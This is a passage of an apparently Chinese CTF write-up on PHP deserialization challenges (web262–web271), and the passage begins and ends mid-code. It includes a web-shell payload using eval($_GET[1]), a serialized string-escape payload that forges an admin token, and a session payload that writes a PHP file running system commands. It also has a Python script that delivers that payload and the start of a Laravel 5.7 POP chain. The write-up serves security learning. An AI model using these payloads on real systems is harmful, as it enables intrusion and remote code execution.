class="line">php%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%22%3C%3Fphp+%40eval%28%24_GET%5</span><br><span class="line">B1%5D%29%3B%3F%3E%22%3B%7D</span><br></pre></td></tr></table></figure><p>运⾏之后访问⻢即可,flag在/flag_is_here</p><h1 id="WEB262"><a href="#WEB262" class="headerlink" title="WEB262"></a>WEB262</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">/*</span><br><span class="line"># -*- coding: utf-8 -*</span><br><span class="line"># @Author: h1xa</span><br><span class="line"># @Date: 2020-12-03 02:37:19</span><br><span class="line"># @Last Modified by: h1xa</span><br><span class="line"># @Last Modified time: 2020-12-03 16:05:38</span><br><span class="line"># @message.php</span><br><span class="line"># @email: h1xa@ctfer.com</span><br><span class="line"># @link: https://ctfer.com</span><br><span class="line">*/</span><br><span class="line">error_reporting(0);</span><br><span class="line">class message{</span><br><span class="line">public $from;</span><br><span class="line">public $msg;</span><br><span class="line">public $to;</span><br><span class="line">public $token='user';</span><br><span class="line">public function __construct($f,$m,$t){</span><br><span class="line">$this->from = $f;</span><br><span class="line">$this->msg = $m;</span><br><span class="line">$this->to = $t;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">$f = $_GET['f'];</span><br><span class="line">$m = $_GET['m'];</span><br><span class="line">$t = $_GET['t'];</span><br><span class="line">if(isset($f) && isset($m) && isset($t)){</span><br><span class="line">$msg = new message($f,$m,$t);</span><br><span class="line">$umsg = str_replace('fuck', 'loveU', serialize($msg));</span><br><span class="line">setcookie('msg',base64_encode($umsg));</span><br><span class="line">echo 'Your message has been sent';</span><br><span class="line">}</span><br><span class="line">highlight_file(__FILE__);</span><br></pre></td></tr></table></figure><p>注释里面message.php</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">message</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$from</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$msg</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$to</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$token</span>=<span class="string">'user'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$f</span>,<span class="variable">$m</span>,<span class="variable">$t</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="keyword">from</span> = <span class="variable">$f</span>;</span><br><span class="line"><span class="variable language_">$this</span>->msg = <span class="variable">$m</span>;</span><br><span class="line"><span class="variable language_">$this</span>->to = <span class="variable">$t</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_COOKIE</span>[<span class="string">'msg'</span>])){</span><br><span class="line"><span class="variable">$msg</span> = <span class="title function_ invoke__">unserialize</span>(<span class="title function_ invoke__">base64_decode</span>(<span class="variable">$_COOKIE</span>[<span class="string">'msg'</span>]));</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$msg</span>->token==<span class="string">'admin'</span>){</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>如果把user变成admin,就可以拿到flag </p><p>考点:反序列化字符串逃逸</p><p>⾸先看⼀段代码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">test</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span> = <span class="string">"user"</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span> = <span class="string">"user"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title function_ invoke__">test</span>();</span><br><span class="line"><span class="variable">$b</span> = <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="variable">$b</span>);</span><br></pre></td></tr></table></figure><p>运⾏结果为</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">string(67) "O:4:"test":2:{s:8:"username";s:4:"user";s:8:"password";s:4:"use</span><br><span class="line">r";}"</span><br></pre></td></tr></table></figure><p>构造user中的内容</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">"O:4:"test":2:{s:8:"username";s:4:"user";s:8:"password";s:4:"hack";}user";}</span><br><span class="line">"</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$a = 'O:4:"test":2:{s:8:"username";s:4:"user";s:8:"password";s:4:"hack";}us</span><br><span class="line">er";}';</span><br><span class="line">var_dump(unserialize($a));</span><br></pre></td></tr></table></figure><p>输出</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">object(__PHP_Incomplete_Class)#1 (3) {</span><br><span class="line">["__PHP_Incomplete_Class_Name"]=></span><br><span class="line">string(4) "test"</span><br><span class="line">["username"]=></span><br><span class="line">string(4) "user"</span><br><span class="line">["password"]=></span><br><span class="line">string(4) "hack"</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>可以发现,之前的user user变成了user hack</p><p>再看题⽬,会将fuck变成loveU,可以控制的从4位变成了5位</p><p>⽽需要构造的是</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">";s:5:"token";s:5:"admin";}</span><br></pre></td></tr></table></figure><p>为27位</p><p>所以需要27个fuck来获得多出来的可控制位</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?f=123&m=123&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck</span><br><span class="line">fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}</span><br></pre></td></tr></table></figure><p>访问/message.php</p><h1 id="web263"><a href="#web263" class="headerlink" title="web263"></a>web263</h1><p>登录界⾯,源码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"></span>)</span>{</span><br><span class="line">$.<span class="title function_ invoke__">ajax</span>({</span><br><span class="line"><span class="attr">url</span>:<span class="string">'check.php'</span>,</span><br><span class="line"><span class="attr">type</span>: <span class="string">'GET'</span>,</span><br><span class="line"><span class="attr">data</span>:{</span><br><span class="line"><span class="string">'u'</span>:$(<span class="string">'#u'</span>).<span class="title function_ invoke__">val</span>(),</span><br><span class="line"><span class="string">'pass'</span>:$(<span class="string">'#pass'</span>).<span class="title function_ invoke__">val</span>()</span><br><span class="line">},</span><br><span class="line">success:<span class="function"><span class="keyword">function</span>(<span class="params">data</span>)</span>{</span><br><span class="line"><span class="title function_ invoke__">alert</span>(JSON.<span class="title function_ invoke__">parse</span>(data).msg);</span><br><span class="line">},</span><br><span class="line">error:<span class="function"><span class="keyword">function</span>(<span class="params">data</span>)</span>{</span><br><span class="line"><span class="title function_ invoke__">alert</span>(JSON.<span class="title function_ invoke__">parse</span>(data).msg);</span><br><span class="line">}</span><br><span class="line">});</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><a href="http://www.zip泄漏/">www.zip泄漏</a> 下载源码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#index.php</span></span><br><span class="line">关键代码</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">'limit'</span>])){</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">'limti'</span>]><span class="number">5</span>?<span class="keyword">die</span>(<span class="string">"</span></span><br><span class="line"><span class="string">登陆失败次数超过限制</span></span><br><span class="line"><span class="string">"</span>):<span class="variable">$_SESSION</span>[<span class="string">'limit'</span>]=base6</span><br><span class="line"><span class="number">4</span>_decode(<span class="variable">$_COOKIE</span>[<span class="string">'limit'</span>]);</span><br><span class="line"><span class="variable">$_COOKIE</span>[<span class="string">'limit'</span>] = <span class="title function_ invoke__">base64_encode</span>(<span class="title function_ invoke__">base64_decode</span>(<span class="variable">$_COOKIE</span>[<span class="string">'limit'</span>]) +<span class="number">1</span>)</span><br><span class="line">;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="title function_ invoke__">setcookie</span>(<span class="string">"limit"</span>,<span class="title function_ invoke__">base64_encode</span>(<span class="string">'1'</span>));</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">'limit'</span>]= <span class="number">1</span>;</span><br><span class="line">}</span><br><span class="line"><span class="comment">#inc.php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$status</span>;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$username</span>,<span class="variable">$password</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->username = <span class="variable">$username</span>;</span><br><span class="line"><span class="variable language_">$this</span>->password = <span class="variable">$password</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">setStatus</span>(<span class="params"><span class="variable">$s</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->status=<span class="variable">$s</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="string">"log-"</span>.<span class="variable">$this</span>->username, <span class="string">"</span></span><br><span class="line"><span class="string">使⽤</span></span><br><span class="line"><span class="string">"</span>.<span class="variable">$this</span>->password.</span><br><span class="line"><span class="string">"</span></span><br><span class="line"><span class="string">登陆</span></span><br><span class="line"><span class="string">"</span>.(<span class="variable">$this</span>->status?<span class="string">"</span></span><br><span class="line"><span class="string">成功</span></span><br><span class="line"><span class="string">"</span>:<span class="string">"</span></span><br><span class="line"><span class="string">失败</span></span><br><span class="line"><span class="string">"</span>).<span class="string">"----"</span>.<span class="title function_ invoke__">date_create</span>()-><span class="title function_ invoke__">format</span>(<span class="string">'Y-m-d H:</span></span><br><span class="line"><span class="string">i:s'</span>));</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>cookie 中的 limit 进⾏base64解码之后传⼊session中,之后调⽤ inc 中的 User 类,并且其中这个 User 类中存在⽂件写⼊函数,所以写⼊⼀句话</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">class User{</span><br><span class="line">public $username = 'ma.php';</span><br><span class="line">public $password = '<?php system("tac flag.php");?>';</span><br><span class="line">public $status='ma';</span><br><span class="line">}</span><br><span class="line">$a=new User();</span><br><span class="line">echo base64_encode('|'.serialize($a));</span><br><span class="line">?></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo2OiJtYS5waHAiO3M6ODoicGFzc3dvcmQ</span><br><span class="line">iO3M6MzE6Ijw/cGhwIHN5c3RlbSgidGFjIGZsYWcucGhwIik7Pz4iO3M6Njoic3RhdHVzIjtzOj</span><br><span class="line">I6Im1hIjt9</span><br></pre></td></tr></table></figure><p>带着cookie去访 index.php ,接着访问 inc/inc.php ,然后就会⽣成⽂件 log-ma.php</p><p>于是写脚本</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">"url"</span></span><br><span class="line">cookies = {<span class="string">"PHPSESSID"</span>: <span class="string">"a1keltr210l16p88sqdrrqrprj"</span>, <span class="string">"limit"</span>: <span class="string">"fE86NDoiVXN</span></span><br><span class="line"><span class="string">lciI6Mzp7czo4OiJ1c2VybmFtZSI7czo2OiJtYS5waHAiO3M6ODoicGFzc3dvcmQiO3M6MzE6Ij</span></span><br><span class="line"><span class="string">w/cGhwIHN5c3RlbSgidGFjIGZsYWcucGhwIik7Pz4iO3M6Njoic3RhdHVzIjtzOjI6Im1hIjt9"</span></span><br><span class="line">}</span><br><span class="line">res1 = requests.get(url + <span class="string">"index.php"</span>, cookies=cookies)</span><br><span class="line">Python</span><br><span class="line">res2 = requests.get(url + <span class="string">"inc/inc.php"</span>, cookies=cookies)</span><br><span class="line">res3 = requests.get(url + <span class="string">"log-ma.php"</span>, cookies=cookies)</span><br><span class="line"><span class="built_in">print</span>(res3.text)</span><br></pre></td></tr></table></figure><h1 id="web264"><a href="#web264" class="headerlink" title="web264"></a>web264</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">message</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$from</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$msg</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$to</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$token</span>=<span class="string">'user'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$f</span>,<span class="variable">$m</span>,<span class="variable">$t</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="keyword">from</span> = <span class="variable">$f</span>;</span><br><span class="line"><span class="variable language_">$this</span>->msg = <span class="variable">$m</span>;</span><br><span class="line"><span class="variable language_">$this</span>->to = <span class="variable">$t</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="variable">$f</span> = <span class="variable">$_GET</span>[<span class="string">'f'</span>];</span><br><span class="line"><span class="variable">$m</span> = <span class="variable">$_GET</span>[<span class="string">'m'</span>];</span><br><span class="line"><span class="variable">$t</span> = <span class="variable">$_GET</span>[<span class="string">'t'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$f</span>) && <span class="keyword">isset</span>(<span class="variable">$m</span>) && <span class="keyword">isset</span>(<span class="variable">$t</span>)){</span><br><span class="line"><span class="variable">$msg</span> = <span class="keyword">new</span> <span class="title function_ invoke__">message</span>(<span class="variable">$f</span>,<span class="variable">$m</span>,<span class="variable">$t</span>);</span><br><span class="line"><span class="variable">$umsg</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">'fuck'</span>, <span class="string">'loveU'</span>, <span class="title function_ invoke__">serialize</span>(<span class="variable">$msg</span>));</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">'msg'</span>]=<span class="title function_ invoke__">base64_encode</span>(<span class="variable">$umsg</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'Your message has been sent'</span>;</span><br><span class="line">}</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure><p>message.php</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">message</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$from</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$msg</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$to</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$token</span>=<span class="string">'user'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$f</span>,<span class="variable">$m</span>,<span class="variable">$t</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="keyword">from</span> = <span class="variable">$f</span>;</span><br><span class="line"><span class="variable language_">$this</span>->msg = <span class="variable">$m</span>;</span><br><span class="line"><span class="variable language_">$this</span>->to = <span class="variable">$t</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_COOKIE</span>[<span class="string">'msg'</span>])){</span><br><span class="line"><span class="variable">$msg</span> = <span class="title function_ invoke__">unserialize</span>(<span class="title function_ invoke__">base64_decode</span>(<span class="variable">$_SESSION</span>[<span class="string">'msg'</span>]));</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$msg</span>->token==<span class="string">'admin'</span>){</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>看了⼀下,和web262相⽐在message.php中多了句开头的session_start(); 就⽤之前的payload打,只不过在访问message.php的时候要使msg有值</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260104225621086.png" alt="image-20260104225621086"></p><h1 id="web271"><a href="#web271" class="headerlink" title="web271"></a>web271</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Laravel - A PHP Framework For Web Artisans</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@package</span> Laravel</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@author</span> Taylor Otwell <taylor<span class="doctag">@laravel</span>.com></span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="title function_ invoke__">define</span>(<span class="string">'LARAVEL_START'</span>, <span class="title function_ invoke__">microtime</span>(<span class="literal">true</span>));</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">|--------------------------------------------------------------------------</span></span><br><span class="line"><span class="comment">| Register The Auto Loader</span></span><br><span class="line"><span class="comment">|--------------------------------------------------------------------------</span></span><br><span class="line"><span class="comment">|</span></span><br><span class="line"><span class="comment">| Composer provides a convenient, automatically generated class loader for</span></span><br><span class="line"><span class="comment">| our application. We just need to utilize it! We'll simply require it</span></span><br><span class="line"><span class="comment">| into the script here so that we don't have to worry about manual</span></span><br><span class="line"><span class="comment">| loading any of our classes later on. It feels great to relax.</span></span><br><span class="line"><span class="comment">|</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="keyword">require</span> <span class="keyword">__DIR__</span> . <span class="string">'/../vendor/autoload.php'</span>;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">|--------------------------------------------------------------------------</span></span><br><span class="line"><span class="comment">| Turn On The Lights</span></span><br><span class="line"><span class="comment">|--------------------------------------------------------------------------</span></span><br><span class="line"><span class="comment">|</span></span><br><span class="line"><span class="comment">| We need to illuminate PHP development, so let us turn on the lights.</span></span><br><span class="line"><span class="comment">| This bootstraps the framework and gets it ready for use, then it</span></span><br><span class="line"><span class="comment">| will load up this application so that we can run it and send</span></span><br><span class="line"><span class="comment">| the responses back to the browser and delight our users.</span></span><br><span class="line"><span class="comment">|</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="variable">$app</span> = <span class="keyword">require_once</span> <span class="keyword">__DIR__</span> . <span class="string">'/../bootstrap/app.php'</span>;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">|--------------------------------------------------------------------------</span></span><br><span class="line"><span class="comment">| Run The Application</span></span><br><span class="line"><span class="comment">|--------------------------------------------------------------------------</span></span><br><span class="line"><span class="comment">|</span></span><br><span class="line"><span class="comment">| Once we have the application, we can handle the incoming request</span></span><br><span class="line"><span class="comment">| through the kernel, and send the associated response back to</span></span><br><span class="line"><span class="comment">| the client's browser allowing them to enjoy the creative</span></span><br><span class="line"><span class="comment">| and wonderful application we have prepared for them.</span></span><br><span class="line"><span class="comment">|</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="variable">$kernel</span> = <span class="variable">$app</span>-><span class="title function_ invoke__">make</span>(<span class="title class_">Illuminate\Contracts\Http\Kernel</span>::<span class="variable language_">class</span>);</span><br><span class="line"><span class="variable">$response</span> = <span class="variable">$kernel</span>-><span class="title function_ invoke__">handle</span>(</span><br><span class="line"><span class="variable">$request</span> = <span class="title class_">Illuminate\Http\Request</span>::<span class="title function_ invoke__">capture</span>()</span><br><span class="line">);</span><br><span class="line">@<span class="title function_ invoke__">unserialize</span>(<span class="variable">$_POST</span>[<span class="string">'data'</span>]);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$kernel</span>-><span class="title function_ invoke__">terminate</span>(<span class="variable">$request</span>, <span class="variable">$response</span>);</span><br></pre></td></tr></table></figure><p>考的是laravel5.7反序列化漏洞</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Illuminate</span>\<span class="title class_">Foundation</span>\<span class="title class_">Testing</span>{</span><br><span class="line"><span class="title class_">class</span> <span class="title class_">PendingCommand</span>{</span><br><span class="line"><span class="title class_">protected</span> $<span class="title class_">command</span>;</span><br><span class="line"><span class="keyword">protected</span> <span class="variable">$parameters</span>;</span><br><span class="line"><span class="keyword">protected</span> <span class="variable">$app</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$test</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$command</span>, <span class="variable">$parameters</span>,<span class="variable">$class</span>,<span class="variable">$app</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="variable language_">$this</span>->command = <span class="variable">$command</span>;</span><br><span class="line"><span class="variable language_">$this</span>->parameters = <span class="variable">$parameters</span>;</span><br><span class="line"><span class="variable language_">$this</span>->test=<span class="variable">$class</span>;</span><br><span class="line"><span class="variable language_">$this</span>->app=<span class="variable">$app</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Illuminate</span>\<span class="title class_">Auth</span>{</span><br><span class="line"><span class="title class_">class</span> <span class="title class_">GenericUser</span>{</span><br><span class="line"><span class="title class_">protected</span> $<span class="title 